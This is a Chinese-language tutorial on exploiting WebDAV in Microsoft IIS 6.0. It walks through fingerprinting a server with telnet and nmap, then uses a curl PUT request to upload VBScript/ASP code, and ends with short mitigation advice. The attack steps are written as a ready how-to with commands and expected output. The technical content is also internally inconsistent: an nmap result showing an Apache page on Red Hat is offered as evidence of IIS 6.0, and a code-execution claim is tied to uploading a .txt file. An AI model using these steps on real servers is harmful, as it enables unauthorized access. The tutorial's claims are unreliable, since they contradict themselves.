Microsoft IIS HTTPD 6.0 漏洞利用

介绍

Microsoft IIS HTTPD 6.0 是一款广泛使用的Web服务器软件，但其早期版本存在安全漏洞，其中最著名的是WebDAV漏洞。该漏洞可让攻击者无需任何身份验证即可执行任意代码，从而完全控制目标系统。

漏洞原理

WebDAV是一种HTTP扩展协议，旨在让用户可以对远程Web服务器上的文件和文件夹执行常规文件系统操作。然而，IIS 6.0 的WebDAV实现存在漏洞，攻击者可以通过发送恶意的请求使WebDAV进程在服务端缓存中创建包含任意数据的文件或目录，并覆盖任意数据。

漏洞利用

攻击者可以通过 WebDAV 漏洞在 IIS 6.0 上执行远程代码，从而完全控制目标系统。

第一步：确定目标系统是否受漏洞影响

1. 打开命令行窗口

2. 使用telnet命令测试目标系统是否为IIS 6.0服务器：
   
   telnet example.com 80
   
   如果目标系统为IIS 6.0服务器，将收到以下响应：
   
   HTTP/1.1 400 Bad Request
   Server: Microsoft-IIS/6.0 
   Date: Wed, 21 Jan 2022 03:55:32 GMT 
   Connection: close
   Content-Length: 39
   
   400 Bad Request
   Invalid Hostname

3. 使用nmap工具对目标系统进行探测
   nmap -p 80 example.com

   如果目标系统为IIS 6.0服务器，将收到以下响应：
   
   PORT   STATE SERVICE
   80/tcp open  http
   |_http-title: Test Page for the Apache HTTP Server on Red Hat Enterprise Linux

第二步：利用WebDAV漏洞

1. 使用curl命令向目标系统发送恶意请求
   curl -v -X PUT -d "<% @ Page Language=VBscript%> <%  rsp='hello world'; response.write(rsp);%>" http://example.com/test.txt
   
   该命令会创建一个名为test.txt的文件，文件内容为VBscript代码，向客户端发送响应：
   
   HTTP/1.1 201 Created
   Server: Microsoft-IIS/6.0
   Date: Thu, 22 Jan 2022 04:05:02 GMT
   Location: http://example.com/test.txt
   Content-Length: 0

2. 使用curl命令获取新创建的文件
   curl http://example.com/test.txt
   
   将会返回以下内容：
   <% @ Page Language=VBscript%> <%  rsp='hello world'; response.write(rsp);%>
   
   攻击者可以在此文件中插入任意代码以执行恶意操作。

防止漏洞攻击

为了防止IIS 6.0上的WebDAV漏洞攻击，建议将 WebDAV 组件从 IIS 6.0 服务器上禁用或使用最新的 IIS 服务器。此外，还应始终定期更新服务器上的操作系统，以确保及时修补任何已知的安全漏洞。

结论

要利用 WebDAV 漏洞，攻击者需要知道目标系统是否为 IIS 6.0 服务器，并且需要发送恶意请求。要防止 WebDAV 漏洞攻击，应禁用 WebDAV 组件或使用更高版本的 IIS 服务器。